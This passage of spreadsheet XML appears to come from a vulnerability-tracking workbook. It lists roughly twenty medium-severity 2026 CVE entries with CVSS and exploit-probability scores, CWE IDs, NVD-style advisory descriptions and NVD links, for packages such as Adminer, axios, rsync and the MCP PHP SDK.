        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3556" s="5" t="inlineStr"/>
      <c r="K3556" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3556" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.5.0 contains a server-side request forgery vulnerability in the login form's server field validator, which only inspects leading integers for privileged ports and fails to reject non-numeric port values. Attackers can inject PDO DSN keys like host= and port= into the server parameter to bypass the privileged-port restriction and establish TCP connections to arbitrary internal hosts and ports before authentication.</t>
        </is>
      </c>
      <c r="M3556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34964</t>
        </is>
      </c>
    </row>
    <row r="3557">
      <c r="A3557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39892</t>
        </is>
      </c>
      <c r="C3557" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3557" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3557" s="5" t="inlineStr"/>
      <c r="F3557" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3557" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3557" s="5" t="inlineStr">
        <is>
          <t>cryptography.io:cryptography</t>
        </is>
      </c>
      <c r="I3557" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J3557" s="5" t="inlineStr"/>
      <c r="K3557" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-131</t>
        </is>
      </c>
      <c r="L3557" s="5" t="inlineStr">
        <is>
          <t>cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 45.0.0 to before 46.0.7, if a non-contiguous buffer was passed to APIs which accepted Python buffers (e.g. Hash.update()), this could lead to buffer overflows. This vulnerability is fixed in 46.0.7.</t>
        </is>
      </c>
      <c r="M3557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39892</t>
        </is>
      </c>
    </row>
    <row r="3558">
      <c r="A3558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40895</t>
        </is>
      </c>
      <c r="C3558" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3558" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3558" s="5" t="inlineStr"/>
      <c r="F3558" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3558" s="5" t="inlineStr"/>
      <c r="H3558" s="5" t="inlineStr">
        <is>
          <t>follow-redirects_project:follow-redirects</t>
        </is>
      </c>
      <c r="I3558" s="5" t="inlineStr">
        <is>
          <t>2026-04-21</t>
        </is>
      </c>
      <c r="J3558" s="5" t="inlineStr"/>
      <c r="K3558" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-212</t>
        </is>
      </c>
      <c r="L3558" s="5" t="inlineStr">
        <is>
          <t>follow-redirects is an open source, drop-in replacement for Node's `http` and `https` modules that automatically follows redirects. Prior to 1.16.0, when an HTTP request follows a cross-domain redirect (301/302/307/308), follow-redirects only strips authorization, proxy-authorization, and cookie headers (matched by regex at index.js). Any custom authentication header (e.g., X-API-Key, X-Auth-Token, Api-Key, Token) is forwarded verbatim to the redirect target. This vulnerability is fixed in 1.16.0.</t>
        </is>
      </c>
      <c r="M3558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40895</t>
        </is>
      </c>
    </row>
    <row r="3559">
      <c r="A3559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42039</t>
        </is>
      </c>
      <c r="C3559" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3559" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3559" s="5" t="inlineStr"/>
      <c r="F3559" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3559" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H3559" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I3559" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J3559" s="5" t="inlineStr"/>
      <c r="K3559" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-770</t>
        </is>
      </c>
      <c r="L3559" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a RangeError. This vulnerability is fixed in 1.15.1 and 0.31.1.</t>
        </is>
      </c>
      <c r="M3559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42039</t>
        </is>
      </c>
    </row>
    <row r="3560">
      <c r="A3560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45274</t>
        </is>
      </c>
      <c r="C3560" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3560" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3560" s="5" t="inlineStr"/>
      <c r="F3560" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3560" s="5" t="inlineStr"/>
      <c r="H3560" s="5" t="inlineStr"/>
      <c r="I3560" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3560" s="5" t="inlineStr"/>
      <c r="K3560" s="5" t="inlineStr">
        <is>
          <t>CWE-602</t>
        </is>
      </c>
      <c r="L3560" s="5" t="inlineStr">
        <is>
          <t>MyBooks is anebook management web server also known as Talebook. In 3.41.2 and earlier, the SignUp.post handler for POST /api/user/sign_up in webserver/handlers/user.py does not enforce the ALLOW_REGISTER configuration flag, even though the frontend hides registration controls when the flag is false. An unauthenticated remote attacker can call the endpoint directly and create a valid account on an instance whose administrator disabled public registration. The process_auth_header function in webserver/handlers/base.py also does not verify the account's active flag, so the newly created and unactivated account can authenticate immediately and access user-level API functionality. The bypass defeats the intended account-creation policy and can supply the low-privilege account required by related authorization vulnerabilities. This issue is fixed in version 3.42.0.</t>
        </is>
      </c>
      <c r="M3560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45274</t>
        </is>
      </c>
    </row>
    <row r="3561">
      <c r="A3561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46688</t>
        </is>
      </c>
      <c r="C3561" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3561" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3561" s="5" t="inlineStr"/>
      <c r="F3561" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3561" s="5" t="inlineStr"/>
      <c r="H3561" s="5" t="inlineStr"/>
      <c r="I3561" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3561" s="5" t="inlineStr"/>
      <c r="K3561" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L3561" s="5" t="inlineStr">
        <is>
          <t>The Meeting Room Booking System (MRBS) is a PHP-based application for booking meeting rooms. Prior to version 1.12.2, an unauthenticated request can be made to redirect the user to a query-specified location. This allows an attacker to create a specially-crafted URL to an MRBS installation that will cause the user who clicks it to be redirected to the attacker-specified redirect URL, which could be a spoofed MRBS login page, for example. Version 1.12.2 contains a fix. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M3561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46688</t>
        </is>
      </c>
    </row>
    <row r="3562">
      <c r="A3562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52738</t>
        </is>
      </c>
      <c r="C3562" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3562" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3562" s="5" t="inlineStr"/>
      <c r="F3562" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3562" s="5" t="inlineStr"/>
      <c r="H3562" s="5" t="inlineStr"/>
      <c r="I3562" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3562" s="5" t="inlineStr"/>
      <c r="K3562" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L3562" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, a consensus-valid block containing a long chain of transparent self-spends to one address can permanently halt Zebra nodes. In zebra-state/src/service/finalized_state/zebra_db/transparent.rs, the finalized-state writer originally applied every newly created output as a credit before applying any spent-output debit from the same block. That credit-first ordering can make the intermediate per-address balance exceed MAX_MONEY even though the final net balance is valid, causing an expect-based panic under the panic equals abort release profile. Because zcashd accepts the triggering block and Zebra encounters it again after every restart, the halt persists until patched software is deployed; exploitation requires mining the specially constructed block and temporarily committing sufficient ZEC to the self-spend chain. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M3562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52738</t>
        </is>
      </c>
    </row>
    <row r="3563">
      <c r="A3563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52873</t>
        </is>
      </c>
      <c r="C3563" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3563" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3563" s="5" t="inlineStr"/>
      <c r="F3563" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3563" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3563" s="5" t="inlineStr"/>
      <c r="I3563" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3563" s="5" t="inlineStr"/>
      <c r="K3563" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-79</t>
        </is>
      </c>
      <c r="L3563" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. From version 2.5.0 until version 2.6.0, the wyzie-open-redeem IPC handler in index.js creates the partition:wyzie-redeem Electron session and registers an onHeadersReceived hook that removes the Content-Security-Policy header from every response in that session. The redeem window also lacks a setWindowOpenHandler restriction, so script injection in sub.wyzie.io, a loaded third-party resource, or a site reached through navigation executes without CSP constraints and can affect additional windows and persistent session storage. A user must open the Wyzie API key redemption window, and exploitation requires attacker-controlled script content in a loaded page. The resulting renderer script can invoke renderer-exposed application functionality and can be chained with other vulnerabilities to access internal services or sensitive data. This issue is fixed in version 2.6.0.</t>
        </is>
      </c>
      <c r="M3563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52873</t>
        </is>
      </c>
    </row>
    <row r="3564">
      <c r="A3564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53454</t>
        </is>
      </c>
      <c r="C3564" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3564" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3564" s="5" t="inlineStr"/>
      <c r="F3564" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3564" s="5" t="inlineStr"/>
      <c r="H3564" s="5" t="inlineStr"/>
      <c r="I3564" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3564" s="5" t="inlineStr"/>
      <c r="K3564" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3564" s="5" t="inlineStr">
        <is>
          <t>Blueprint Studio is a VS Code-like file editor for Home Assistant configuration files. Prior to 2.5.2, Blueprint Studio configured Git's credential.helper store when saving Git credentials, causing Git credential-store to persist usernames and access tokens in plaintext in the .git-credentials file for the user running Home Assistant. Tokens could remain outside Blueprint Studio's intended Home Assistant storage and be read by other users or processes with access to the same filesystem context. The persistent helper configuration also affected later Git operations beyond the immediate Blueprint Studio action. This issue is fixed in version 2.5.2.</t>
        </is>
      </c>
      <c r="M3564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53454</t>
        </is>
      </c>
    </row>
    <row r="3565">
      <c r="A3565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53531</t>
        </is>
      </c>
      <c r="C3565" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3565" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3565" s="5" t="inlineStr"/>
      <c r="F3565" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3565" s="5" t="inlineStr"/>
      <c r="H3565" s="5" t="inlineStr"/>
      <c r="I3565" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3565" s="5" t="inlineStr"/>
      <c r="K3565" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="L3565" s="5" t="inlineStr">
        <is>
          <t>RaTeX is a KaTeX-compatible math rendering engine written in Rust. Prior to version 0.1.11, RaTeX’s recursive-descent parser recurses one (or more) native stack frame per nesting level at `{`, `\left`, `\sqrt{`, `^{`, etc, with no maximum depth limit. A short, ~10 KB input of nested groups overflows the 8 MB main-thread stack and aborts the process. With `panic = "abort"` (`Cargo.toml:48`), and because a Rust stack overflow is always a fatal `SIGABRT` regardless of panic strategy this is an unrecoverable, whole-process denial of service reachable from a single untrusted LaTeX string. Version 0.1.11 fixes the issue.</t>
        </is>
      </c>
      <c r="M3565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53531</t>
        </is>
      </c>
    </row>
    <row r="3566">
      <c r="A3566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53551</t>
        </is>
      </c>
      <c r="C3566" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3566" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3566" s="5" t="inlineStr"/>
      <c r="F3566" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3566" s="5" t="inlineStr"/>
      <c r="H3566" s="5" t="inlineStr"/>
      <c r="I3566" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3566" s="5" t="inlineStr"/>
      <c r="K3566" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3566" s="5" t="inlineStr">
        <is>
          <t>free5GC is an open-source implementation of the 5G core network. Prior to 1.4.5, the free5GC AUSF (Authentication Server Function) does not validate the supiOrSuci field in UE authentication requests. Null bytes (\x00) and other control characters pass through JSON parsing unchanged and are forwarded to the UDM in an unescaped URL path. This causes Go's net/url.Parse() to fail, returning HTTP 500 "System failure" and leaking internal stack traces. An unauthenticated attacker can trigger this at scale causing denial of service for all subscribers attempting authentication through the affected AUSF. This vulnerability is fixed in 1.4.5.</t>
        </is>
      </c>
      <c r="M3566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53551</t>
        </is>
      </c>
    </row>
    <row r="3567">
      <c r="A3567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53602</t>
        </is>
      </c>
      <c r="C3567" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3567" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3567" s="5" t="inlineStr"/>
      <c r="F3567" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3567" s="5" t="inlineStr"/>
      <c r="H3567" s="5" t="inlineStr"/>
      <c r="I3567" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3567" s="5" t="inlineStr"/>
      <c r="K3567" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="L3567" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.3.7, two related authorization gaps let a host that should no longer be trusted obtain a fresh, valid Nebula certificate, because nebula-mgmt does not re-evaluate revocation/authorization state at certificate issuance time — only at poll time. Firstly, the blocklist is not enforced at sign / re-enroll time. internal/api/enroll.go:128 calls caMgr.Sign(...) without consulting the blocklist. The blocklist is only checked in the poll path (internal/api/updates.go:57, fingerprintInBlocklist). The blocklist is keyed by certificate fingerprint (internal/store/sqlite.go), so a re-enrollment produces a new fingerprint that is not in the blocklist. Secondly, renewal does not re-validate operator / CA status. Auto-renewal at poll time (internal/api/updates.go:285-319, signHostCert) reads host.Name, host.Groups, host.NebulaIPs from the DB and re-signs without checking whether the owning operator is still active or the CA still valid. DisableOperator (internal/store/sqlite_operators.go) revokes sessions and API keys but does not retire the operator's CAs, and pki/signer.go checks only CA cert time-expiry, not operator/CA status. This issue has been patched in version 0.3.7.</t>
        </is>
      </c>
      <c r="M3567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53602</t>
        </is>
      </c>
    </row>
    <row r="3568">
      <c r="A3568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53757</t>
        </is>
      </c>
      <c r="C3568" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3568" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3568" s="5" t="inlineStr"/>
      <c r="F3568" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3568" s="5" t="inlineStr"/>
      <c r="H3568" s="5" t="inlineStr"/>
      <c r="I3568" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3568" s="5" t="inlineStr"/>
      <c r="K3568" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3568" s="5" t="inlineStr">
        <is>
          <t>Emlog is an open source website building system. In versions 2.6.29 and prior, the emUnZip() function extracts all ZIP entries via ZipArchive::extractTo() without validating entry paths for ../ traversal sequences. Only the first entry's subdirectory structure is checked. An attacker can overwrite arbitrary files on the server filesystem, including config.php for immediate RCE. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="M3568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53757</t>
        </is>
      </c>
    </row>
    <row r="3569">
      <c r="A3569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53785</t>
        </is>
      </c>
      <c r="C3569" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3569" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3569" s="5" t="inlineStr"/>
      <c r="F3569" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3569" s="5" t="inlineStr"/>
      <c r="H3569" s="5" t="inlineStr"/>
      <c r="I3569" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3569" s="5" t="inlineStr"/>
      <c r="K3569" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3569" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains a path traversal vulnerability that allows a malicious sender to write files outside the intended destination directory tree by crafting relative paths with symlink components in --relative mode. The make_path() function follows symlinks pointing outside the destination tree while creating intermediate directories without verifying that created paths remain within the destination boundary, enabling arbitrary file writes on the receiver's filesystem.</t>
        </is>
      </c>
      <c r="M3569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53785</t>
        </is>
      </c>
    </row>
    <row r="3570">
      <c r="A3570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53788</t>
        </is>
      </c>
      <c r="C3570" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3570" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3570" s="5" t="inlineStr"/>
      <c r="F3570" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3570" s="5" t="inlineStr"/>
      <c r="H3570" s="5" t="inlineStr"/>
      <c r="I3570" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3570" s="5" t="inlineStr"/>
      <c r="K3570" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L3570" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains a newline injection vulnerability in the name-converter uid/gid mapping interface that allows local attackers to forge protocol messages by creating user or group names containing newline characters. Attackers can inject malicious newline characters into names communicated over the pipe-based line-oriented protocol to cause the rsync daemon to process attacker-influenced data as legitimate protocol input, corrupting uid/gid mapping logic.</t>
        </is>
      </c>
      <c r="M3570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53788</t>
        </is>
      </c>
    </row>
    <row r="3571">
      <c r="A3571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53794</t>
        </is>
      </c>
      <c r="C3571" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3571" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3571" s="5" t="inlineStr"/>
      <c r="F3571" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3571" s="5" t="inlineStr"/>
      <c r="H3571" s="5" t="inlineStr"/>
      <c r="I3571" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3571" s="5" t="inlineStr"/>
      <c r="K3571" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L3571" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains a logic error in --max-alloc handling that allows a sender or configuration setting --max-alloc=0 to disable allocation sanity checks entirely rather than enforcing a zero-byte cap. Attackers can exploit this flaw to cause the receiver to attempt unbounded memory allocations for file list and data structures, potentially exhausting available memory and causing a denial of service.</t>
        </is>
      </c>
      <c r="M3571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53794</t>
        </is>
      </c>
    </row>
    <row r="3572">
      <c r="A3572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53933</t>
        </is>
      </c>
      <c r="C3572" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3572" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3572" s="5" t="inlineStr"/>
      <c r="F3572" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3572" s="5" t="inlineStr"/>
      <c r="H3572" s="5" t="inlineStr"/>
      <c r="I3572" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3572" s="5" t="inlineStr"/>
      <c r="K3572" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L3572" s="5" t="inlineStr">
        <is>
          <t>Maravel, a PHP framework oriented towards dependency injection, prior to version 10.73.1 has a side-channel information disclosure issue. When a route was compiled with dynamic placeholders (e.g., `/api/v1/users/{id}`), the raw string placeholder key was mistakenly registered into the flat static route checklist. An attacker scanning endpoints could intentionally pass the literal template syntax (e.g., `GET /api/v1/users/{id}`) to force an unexpected match against the static map. Because the dynamic tree engine was bypassed, no arguments were captured. This forced modern PHP 8+ versions to throw a native `ArgumentCountError`, resulting in a 500 Internal Server Error instead of a uniform 404 Not Found. By tracking which fuzz patterns exploded into a 500 error, a malicious actor could programmatically profile and map out internal route parameter names and controller schemas. Version 10.73.1 contains a patch. As a workaround, mitigate this side-channel leak by implementing a defensive check in a global middleware. This will reject any literal brace patterns before they reach the router engine.</t>
        </is>
      </c>
      <c r="M3572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53933</t>
        </is>
      </c>
    </row>
    <row r="3573">
      <c r="A3573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53965</t>
        </is>
      </c>
      <c r="C3573" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3573" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3573" s="5" t="inlineStr"/>
      <c r="F3573" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3573" s="5" t="inlineStr"/>
      <c r="H3573" s="5" t="inlineStr"/>
      <c r="I3573" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3573" s="5" t="inlineStr"/>
      <c r="K3573" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L3573" s="5" t="inlineStr">
        <is>
          <t>The MCP PHP SDK (Composer package mcp/sdk) is the official Model Context Protocol SDK for PHP. In versions 0.5.0 through 0.7.0, the HTTP client transport reads a Server-Sent Events response stream incrementally and appends each chunk to an in-memory buffer with no upper bound. The buffer is only flushed when an SSE event delimiter, a double newline, is found, so a remote MCP server that streams response bytes without ever sending the delimiter causes the buffer to grow without limit. A malicious, compromised, or man-in-the-middle-controlled server that the client connects to over the HTTP transport can exploit this to exhaust the client process's memory, triggering a fatal allocation error or OS out-of-memory kill and denying service to the MCP client. The issue affects any client using HttpTransport against an untrusted server endpoint and does not require authentication or user interaction beyond initiating the connection. This issue is fixed in version 0.7.1.</t>
        </is>
      </c>
      <c r="M3573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53965</t>
        </is>
      </c>
    </row>
    <row r="3574">
      <c r="A3574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54272</t>
        </is>
      </c>
      <c r="C3574" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3574" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3574" s="5" t="inlineStr"/>
      <c r="F3574" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3574" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3574" s="5" t="inlineStr"/>
      <c r="I3574" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J3574" s="5" t="inlineStr"/>
      <c r="K3574" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918</t>
        </is>
      </c>
      <c r="L3574" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Versions 10.1.1 through 10.2.0 are vulnerable to SSRF through misclassification of IPv4-mapped/NAT64 IPv6 addresses. Address6.getType() classifies an address by matching it against a table of known IPv6 special-use prefixes, returning Global unicast when nothing matches. That table had no entry for the IPv4-mapped range (::ffff:0:0/96), so every mapped address fell through to Global unicast; NAT64 addresses matched their own NAT64 … labels. The boolean checks isLoopback, isUnspecified, and isMulticast compared getType() against a fixed label and so returned false, while isLinkLocal and isULA checked only the native IPv6 ranges. The library already exposed isMapped4() and to4(), but did not apply them inside these checks, so a mapped or NAT64 address was never normalized to its embedded IPv4 address before classification. For IPv4-mapped addresses the host OS routes to the IPv4 stack, so the misclassification is reachable on any dual-stack host. For NAT64, the classification bypass is unconditional but end-to-end reachability additionally requires a NAT64/DNS64 gateway in the deployment network.This issue has been fixed in version 10.2.1.</t>
        </is>
      </c>
      <c r="M3574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54272</t>
        </is>
      </c>
    </row>
    <row r="3575">
